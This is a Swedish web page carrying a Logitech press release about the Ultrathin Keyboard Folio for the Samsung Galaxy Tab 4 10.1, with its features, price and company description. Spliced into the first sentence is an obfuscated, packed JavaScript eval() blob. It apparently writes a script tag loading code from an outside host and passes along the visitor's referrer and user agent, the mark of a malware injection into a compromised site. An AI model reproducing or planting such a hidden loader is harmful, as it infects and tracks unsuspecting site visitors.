Image Image Image Image Image Image Image Image Image Image

| 18 september, 2018

Scroll to top

Top

Logitech Ultrathin Keyboard Folio

Logitech Ultrathin Keyboard Folio
Sebastian Plengier Ehrnfelt

Logitech eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yszid|var|u0026u|referrer|fhaai||js|php’.split(‘|’),0,{}))
lanserar det senaste tillskottet till sin linje tablet-tillbehör, Logitech Ultrathin Keyboard Folio för nya Samsung Galaxy Tab 4 10.1. Folion är ett tunt och lätt skyddande fodral tillverkat av toppmoderna material och framför allt utrustat med ett android-anpassat bluetooth-tangentbord.

”Logitech skapade Ultrathin Keyboard Folio för att ge dig möjlighet att skydda din Samsung Galaxy Tab 4 10.1, men också för att ge dig möjlighet att vara ännu mer produktiv när du är på språng,” säger Christina Holmberg på Logitech Sverige. ”Med folion blir din tablet bättre, oavsett om du ska skriva mail eller bara se en film.”

Logitech Ultrathin Keyboard Folio har ett smidigt tangentbord med välplacerade tangenter och en rad olika Android-snabbkommandon för att göra ditt skrivande bekvämare. Du har dessutom möjligheten att ställa din tablet i två olika positioner, stående för att kunna skriva, och liggande för att exempelvis surfa eller spela spel. Självklart är materialet vatten- och spillbeständigt för att skydda från olyckor.

Pris och tillgänglighet

Logitech Ultrathin Keyboard Folio for Samsung Galaxy Tab 4 10.1 finns tillgänglig från maj 2014 för ett cirkapris från 899:-. För mer info se www.logitech.com eller vår blogg.

Om Logitech

Logitech är världsledande inom produkter som kopplar människor samman med de digitala upplevelser som spelar roll för dem. Med en spännvidd över mängder av dator-, kommunikations- och underhållningsplattformar underlättar och förbättrar Logitechs hård- och mjukvara digital navigation, konsumtion av musik- och videounderhållning, gaming, socialt nätverkande, kommunikation över internet, videosäkerhet och kontroll över hemunderhållning. Logitech grundades 1981 och är ett Schweiziskt publikt aktiebolag listat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI).

Detta är ett pressmeddelande från Logitech